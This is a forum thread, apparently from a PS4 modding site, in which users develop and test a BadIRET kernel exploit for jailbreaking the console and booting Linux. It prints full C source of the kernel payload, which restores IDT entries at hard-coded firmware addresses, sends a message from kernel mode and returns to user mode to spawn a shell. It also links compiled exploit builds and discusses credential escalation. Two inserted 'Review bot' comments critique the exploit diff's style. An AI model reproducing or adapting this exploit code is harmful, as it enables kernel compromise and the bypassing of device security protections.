eXtreme

Hack The PS4 - Status for End Users


1 hour ago, eXtreme said:

 

OK, you are right ;)

Maybe he is not known for reversing and maybe he is a newcomer, but maybe he finds something; we don't know. I've only talked with him for a few days; to me he has some coding knowledge and I don't think he's a poser or a liar.

I didn't say he is a poser or a liar.

 

Let me ask another way... how would this specific person be able to reverse a .sprx?

SPRX ---> Secured PRX

SKPRX ---> Secured Kernel PRX

SUPRX ---> Secured User PRX

The kernel of the PS4 could be reversed because it was dumped out of RAM as a .ELF. It isn't secured any more; it's no SELF ---> Secured ELF ;)

11 minutes ago, Zer0xFF said:

Ok then, if we agree I'm not completely useless, try this version of BadIRET

https://drive.google.com/file/d/0B8quJDWCl01HNDhXd2tSSExTVWc/view?usp=sharing

Googling around I found IDT restoration code, which I added to the leaked code; a few more changes and I have this.

@Mistawes there is your first public (I guess) working version of badIRET :)

&&

@eXtreme about what a user without a PS4 can do. :P

Edited by cfwprophet


Oh, I'm a lazy bastard. I haven't even got my 1.76 set up. It's somewhere in a dark box and has to fear the next day :D

But from what it looks like, I really need to go on with the RCO tool :P

1 minute ago, cfwprophet said:

Oh, I'm a lazy bastard. I haven't even got my 1.76 set up. It's somewhere in a dark box and has to fear the next day :D

But from what it looks like, I really need to go on with the RCO tool :P

lol, you shouldn't really be retweeting it just yet then :P


Why not? You used Google and found some information, which you used to solve a problem. Even if it may not be the correct solution on the first shot, that's the way things are done. :)

9 minutes ago, cfwprophet said:

Why not? You used Google and found some information, which you used to solve a problem. Even if it may not be the correct solution on the first shot, that's the way things are done. :)

I was just hoping someone would verify this beforehand, but ah well, more people will see this now and perhaps report back.


In case the public Git goes down.

void payload()
 {
-	struct thread *td;
+struct thread *td;
 	
-	//Restore IDT state
-	void (*setidt)() = (void *)0xFFFFFFFF82603FA0;
+//Restore IDT state
+void (*setidt)() = (void *)0xFFFFFFFF82603FA0;
 	
-	setidt(IDT_DE, 0xFFFFFFFF825FED40, SDT_SYSIGT, SEL_KPL, 0);
-
+setidt(IDT_DE, 0xFFFFFFFF825FED40, SDT_SYSIGT, SEL_KPL, 0);
 
 setidt(IDT_DB, 0xFFFFFFFF825FECB0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_NMI, 0xFFFFFFFF825FF3E0, SDT_SYSIGT, SEL_KPL, 2);
 
-
 setidt(IDT_BP, 0xFFFFFFFF825FECE0, SDT_SYSIGT, SEL_UPL, 0);
 
-
 setidt(IDT_OF, 0xFFFFFFFF825FED70, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_BR, 0xFFFFFFFF825FEDA0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_UD, 0xFFFFFFFF825FEDD0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_NM, 0xFFFFFFFF825FEE00, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_DF, 0xFFFFFFFF825FF0C0, SDT_SYSIGT, SEL_KPL, 1);
 
-
 setidt(IDT_FPUGP, 0xFFFFFFFF825FEE30, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_TS, 0xFFFFFFFF825FEF20, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_NP, 0xFFFFFFFF825FEF40, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_SS, 0xFFFFFFFF825FEF60, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_GP, 0xFFFFFFFF825FF1E0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_PF, 0xFFFFFFFF825FF170, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_MF, 0xFFFFFFFF825FEEC0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_AC, 0xFFFFFFFF825FEF80, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_MC, 0xFFFFFFFF825FEE60, SDT_SYSIGT, SEL_KPL, 0);
 
 setidt(IDT_XF, 0xFFFFFFFF825FEEF0, SDT_SYSIGT, SEL_KPL, 0);
 
 setidt(IDT_DTRACE_RET, 0xFFFFFFFF825FED10, SDT_SYSIGT, SEL_UPL, 0);
 
-
-
 	// Switch back to kernel GS base
 	asm volatile("swapgs");
 
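Review bot: this hunk is a whitespace-only change: every `setidt` line loses its leading tab and the separating blank `-` lines are dropped, while the `asm volatile("swapgs")` lines that follow keep their tab, so the body of `payload()` ends up with mixed indentation. Either leave the original indentation alone or reindent the whole function in one go; a hunk that only strips whitespace also hides the fact that nothing in the IDT restoration logic changed. Separately, `void (*setidt)()` is declared without a prototype, so the compiler cannot check the five arguments passed on each line, and neither the `setidt` address nor the handler addresses carry a comment saying which firmware version they were taken from; a typed prototype and one comment naming the version would save the next reader from guessing.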
@@ -79,7 +60,7 @@ setidt(IDT_DTRACE_RET, 0xFFFFFFFF825FED10, SDT_SYSIGT, SEL_UPL, 0);
 	} 
 
 	// return to user mode to spawn the shell
-    asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
+    asm ("swapgs; sysretq;" :: "c"(user_shellcode)); // store the shellcode addr to rcx
 }
 
 void user_shellcode()
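Review bot: the rename from `shellcode` to `user_shellcode` in the `sysretq` line is the right fix, since the trailing context defines `void user_shellcode()` and the visible code defines no `shellcode` symbol, so the old line would not have resolved; two loose ends remain: the comment still says "store the shellcode addr to rcx" and should name `user_shellcode`, and this statement uses bare `asm` where the rest of the function uses `asm volatile`, so pick one form for consistency.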

Revision 2

 

void payload()
{
    struct thread *td;

    // Restore IDT state
    void (*setidt)() = (void *)0xFFFFFFFF82603FA0;

    setidt(IDT_DE, 0xFFFFFFFF825FED40, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_DB, 0xFFFFFFFF825FECB0, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_NMI, 0xFFFFFFFF825FF3E0, SDT_SYSIGT, SEL_KPL, 2);
    setidt(IDT_BP, 0xFFFFFFFF825FECE0, SDT_SYSIGT, SEL_UPL, 0);
    setidt(IDT_OF, 0xFFFFFFFF825FED70, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_BR, 0xFFFFFFFF825FEDA0, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_UD, 0xFFFFFFFF825FEDD0, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_NM, 0xFFFFFFFF825FEE00, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_DF, 0xFFFFFFFF825FF0C0, SDT_SYSIGT, SEL_KPL, 1);
    setidt(IDT_FPUGP, 0xFFFFFFFF825FEE30, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_TS, 0xFFFFFFFF825FEF20, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_NP, 0xFFFFFFFF825FEF40, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_SS, 0xFFFFFFFF825FEF60, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_GP, 0xFFFFFFFF825FF1E0, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_PF, 0xFFFFFFFF825FF170, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_MF, 0xFFFFFFFF825FEEC0, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_AC, 0xFFFFFFFF825FEF80, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_MC, 0xFFFFFFFF825FEE60, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_XF, 0xFFFFFFFF825FEEF0, SDT_SYSIGT, SEL_KPL, 0);
    setidt(IDT_DTRACE_RET, 0xFFFFFFFF825FED10, SDT_SYSIGT, SEL_UPL, 0);

    // Switch back to kernel GS base
    asm volatile("swapgs");

    // Get td pointer
    asm volatile("mov %0, %%gs:0" : "=r"(td));

    // Send a message
    {
        int (*sendto)(struct thread *td, struct sendto_args *uap) = (void *)0xFFFFFFFF8249EC10;

        struct sendto_args args = { sock, criticalPayloadMessage, strlen(criticalPayloadMessage), 0, NULL, 0 };
        sendto(td, &args);
    }

    // return to user mode to spawn the shell
    asm ("swapgs; sysretq;" :: "c"(user_shellcode)); // store the shellcode addr to rcx
}

void user_shellcode()
{
    //printf("[*] Got root!\n");
    exit(0);
}

 

 

Credits: https://gist.github.com/Relys/6251b8f55a088545048f/2dba1fce5cac299afc091d962eebd99670487f72

Edited by PS4BOT

2 hours ago, Zer0xFF said:

Ok then, if we agree I'm not completely useless, try this version of BadIRET

https://drive.google.com/file/d/0B8quJDWCl01HNDhXd2tSSExTVWc/view?usp=sharing

Googling around I found IDT restoration code, which I added to the leaked code; a few more changes and I have this.

Thank you, I can test it in 2 hours.


Nice to see some progress in here lol!

On 16.3.2016 at 6:58 PM, Zer0xFF said:

As far as the steps you mentioned, everything seems to be in order.

You're also probably using the extreme-modding PS4-Playground to load the binary (BadIRET),

but I noticed this PR a few days ago: Fix for "There is not enough free system memory." error when loading a binary

The chances are extreme-modding hasn't been updated yet, so you're better off setting up your own localhost and using the updated version directly from CtrutE. PS4-playground

If @eXtreme is the same extreme site owner, perhaps you can update that.

 

 

Nah, I use Playground locally and map it with Charles proxy. It's not the Playground, since I applied the fix that kr105 applied to the GitHub. It's because my badiret.bin has a bad return to userland method; I used the one that was on Relys' GitHub that's been uploaded here and am still trying to get it working. That bin that you uploaded works just as it's supposed to. What did you use for your return? I've got the sidt code with the correct addresses for restoring the IDT but I've been using "asm volatile ("swapgs; sysretq;" :: "c"(user_shellcode));". I've tried it with iretq as well but I'm getting a loop for executing critical payload. It might be my shellcode since I use a return and not an exit(), since gcc complains. Do I need to include a header for exit() or is there an alternative like a syscall for the PS4? Any advice would be greatly appreciated @Zer0xFF, this has been great fun and is getting me motivated to get back to learning C.

*Just for clarity, since you said you don't have the means to test it: your bin loads, executes, and returns to the web browser without a crash. I don't know the IP so I wasn't able to see anything on the tcpdump, but it looks like it works fine. Nice job Zer0xFF! :double-thumbs-up:

 

Edited by cfwprophet


Try

return 0;

:P

PS. Or better said, it is OK to use that.

How do you compile your code?

Edited by cfwprophet

1 hour ago, wildcard said:

 

Nice to see some progress in here lol!

Nah, I use Playground locally and map it with Charles proxy. It's not the Playground, since I applied the fix that kr105 applied to the GitHub. It's because my badiret.bin has a bad return to userland method; I used the one that was on Relys' GitHub that's been uploaded here and am still trying to get it working. That bin that you uploaded works just as it's supposed to. What did you use for your return? I've got the sidt code with the correct addresses for restoring the IDT but I've been using "asm volatile ("swapgs; sysretq;" :: "c"(user_shellcode));". I've tried it with iretq as well but I'm getting a loop for executing critical payload. It might be my shellcode since I use a return and not an exit(), since gcc complains. Do I need to include a header for exit() or is there an alternative like a syscall for the PS4? Any advice would be greatly appreciated Zer0xFF, this has been great fun and is getting me motivated to get back to learning C.

exit wouldn't compile for me either, but since the payload method is a void return method, there isn't even a need for a return, and a return shouldn't affect the result anyway. Aka I don't call exit or return.

Quote

*Just for clarity, since you said you don't have the means to test it: your bin loads, executes, and returns to the web browser without a crash. I don't know the IP so I wasn't able to see anything on the tcpdump, but it looks like it works fine. Nice job Zer0xFF! :double-thumbs-up:

The IP was left at the default value 192.168.1.119. I'd assume since you know how to use Charles proxy, you know how to change your PC IP?

If not, what are you running, OSX/win/linux? Or maybe even post your IP and I might even compile you one.

If this works, we'll probably have Linux by this weekend; I just need to figure out how to do "cred->cr_prison = &prison0;"

For the life of me, I couldn't find a way to create prison0 or reference it without referencing half the FreeBSD kernel.

I've spent all day trying to figure it out with no luck... yet I have exec and the Linux kernel compiled. *So close yet so far!!* (bold statement, so I hope I don't disappoint)

But as @cfwprophet said, how are you building this? I'm doing it on FreeBSD myself.

@cfwprophet what is your SDK fix? I never had an issue with it before.

Edited by Zer0xFF


 

9 minutes ago, Zer0xFF said:

exit wouldn't compile for me either, but since the payload method is a void return method, there isn't even a need for a return, and a return shouldn't affect the result anyway. Aka I don't call exit or return.

The IP was left at the default value 192.168.1.119. I'd assume since you know how to use Charles proxy, you know how to change your PC IP?

If not, what are you running, OSX/win/linux? Or maybe even post your IP and I might even compile you one.

But as @cfwprophet said, how are you building this? I'm doing it on FreeBSD myself.

@cfwprophet what is your SDK fix? I never had an issue with it before.

Ah, gotcha, that makes more sense now. Yeah, I only tested it quickly, so it didn't occur to me to change my PC IP to the known debug IP. Of all IPs, that's the one I'd guess too lol :P Yeah, I'll test it now on it and let you know; no need to compile me one.

21 minutes ago, Zer0xFF said:

@cfwprophet what is your SDK fix? I never had an issue with it before.

Not specifically my fix, and it depends on when you got it from Git. One of the examples didn't compile. I identified the source but, in case I'm blind ( :P ), I didn't see where the problem was and told @masterzorag about it. He then saw the missing initUSB();

PS. To be more specific, I told him that the compiler points to usb.c (or however the source is called) but I simply didn't see that damn missing initUSB() in the example.

PS². But in main I did just now see that some changes have been done to the SDK in the last few days.

Fix kqueue type

Edited by cfwprophet

13 minutes ago, cfwprophet said:

Not specifically my fix, and it depends on when you got it from Git. One of the examples didn't compile. I identified the source but, in case I'm blind ( :P ), I didn't see where the problem was and told @masterzorag about it. He then saw the missing initUSB();

PS. To be more specific, I told him that the compiler points to usb.c (or however the source is called) but I simply didn't see that damn missing initUSB() in the example.

PS². But in main I did just now see that some changes have been done to the SDK in the last few days.

Fix kqueue type

My SDK is up to date, but I just wanted to confirm there isn't anything you added that wasn't up on GitHub :good:


Zer0xFF, upon testing the bin with 192.168.1.119 / firewall off / port 9023, I'm consistently getting stuck on executing... and was able to press the PS button to go to the home screen during entering critical payload, which I don't think I've been able to do before. It's not crashing the kernel, but I don't have a controller connection even when plugged in. I'll have to test more tomorrow.

I'm on Windows 7 running Charles to local Playground files, and using an Ubuntu VM for the PS4SDK, fully compiled. I've been compiling badiret.bin for a while now and have been able to play with them for different results. I believe it's my return to userland via the asm volatile using swapgs and sysretq, just like on Relys' GitHub. With iretq in place of sysretq I get an infinite payload loop, and with sysretq I get an out of memory error. My shellcode is just like in Relys', just with return 0 now, and I still haven't gotten it. I'll have to test when I get the chance again. lol, I could never get &prison0 working either and was looking into including a load of the FreeBSD library! Yeah, umm, f that lol. There must be a way to do it in the defines header. I've got the creds resolved, but when I include them my PS4 crashes and shuts off; I haven't tried it with the return 0 at the end of my payload, idk. lol, it'll get there. Same here on the kexec and ps4-linux; I think SonyUSA had some code on a pastebin I took note of for loading it. It was taken down but I copied it here. http://pastebin.com/dQ0gj3Ez

Edited by wildcard

13 minutes ago, wildcard said:

Zer0xFF, upon testing the bin with 192.168.1.119 / firewall off / port 9023, I'm consistently getting stuck on executing... and was able to press the PS button to go to the home screen during entering critical payload, which I don't think I've been able to do before. It's not crashing the kernel, but I don't have a controller connection even when plugged in. I'll have to test more tomorrow.

Not crashing the kernel is a good sign, I guess, so the IDT is working as it should.

Quote

I'm on Windows 7 running Charles to local Playground files, and using an Ubuntu VM for the PS4SDK, fully compiled. I've been compiling badiret.bin for a while now and have been able to play with them for different results. I believe it's my return to userland via the asm volatile using swapgs and sysretq, just like on Relys' GitHub. With iretq in place of sysretq I get an infinite payload loop, and with sysretq I get an out of memory error. My shellcode is just like in Relys', just with return 0 now, and I still haven't gotten it. I'll have to test when I get the chance again. lol, I could never get &prison0 working either and was looking into including a load of the FreeBSD library! Yeah, umm, f that lol. There must be a way to do it in the defines header. I've got the creds resolved, but when I include them my PS4 crashes and shuts off; I haven't tried it with the return 0 at the end of my payload, idk. lol, it'll get there. Same here on the kexec and ps4-linux; I think SonyUSA had some code on a pastebin I took note of for loading it. It was taken down but I copied it here. http://pastebin.com/dQ0gj3Ez

OOPS, I didn't switch sysretq to iretq; I'll build it now and post that up soon.

And looking at SonyUSA's code, it's much the same, except it doesn't try to return a shell but boots Linux straight away; this is what I'm also trying to achieve,

but I haven't added any of the Linux kexec code to badIRET yet, as I wanna make sure this is working first.

Also, I couldn't get badIRET to build on Ubuntu, but the Linux kernel builds fine.

Edited by Zer0xFF


Which setup do you have?

Hum... maybe I should update the PS4_Compile_Ubuntu with the SDK fixes + psxdev's ps4dev source (EDIT: install language pkgs and change to English :P ) and upload it...

By the way, try this.

PS. You need clang + llvm + a special build of gcc to compile for PS4.

Edited by cfwprophet

6 minutes ago, cfwprophet said:

Which setup do you have?

Hum... maybe I should update the PS4_Compile_Ubuntu with the SDK fixes + psxdev's ps4dev source and upload it...

By the way, try this.

I've got an Ubuntu 16.04 setup and FreeBSD 10.X.

I got the Linux kernel to build on Ubuntu but didn't try to build it on FreeBSD, and badIRET to build on FreeBSD, but this won't build on Ubuntu;

I can't find the FreeBSD libc for Ubuntu.

I actually only have 1 GB free as all my free memory is allocated to FreeBSD, but if you post how you got libc on Ubuntu, I can probably get it to work.

@wildcard

This is a newer build with the iretq fix: https://drive.google.com/file/d/0B8quJDWCl01HTkRHUmRySHZDNU0/view?usp=sharing


It's included in the PS4 SDK too. ;)

The compiled one I uploaded has it in it. Give it a shot. I think it is on the first page of this thread.

Edit: on the second one here.

Edited by cfwprophet


I've made a few more builds in the hope that we might get something right :/

https://drive.google.com/open?id=0B8quJDWCl01HSEVQU2lsaGRaR2c

If anyone wants to try them, try Bad*-4* and Bad*-5*

Note the u=ubuntu / f=freebsd builds: there shouldn't be any difference between them, but I've still built them for the sake of it.

extreme = just has the IP set to 192.168.199.241, while the normal/default is 192.168.1.119

@wildcard looking at SonyUSA's code, she/he doesn't call iretq but just 'swaps', which is what I'm trying in version 5.

If this still doesn't work, I'll just add the Linux kexec call to that, since we know we're getting as far as critical payload and so we might as well just try to boot Linux straight away;

since kexec boots a new kernel, that kernel shouldn't be crashing, so we might at least have that much to work with.

Edited by Zer0xFF


....Well, I'm pretty sure that I have seen 'swapgs' and 'iretq' somewhere... for sure it depends on what you want to do, whether there is only one of them or both together... :angel:
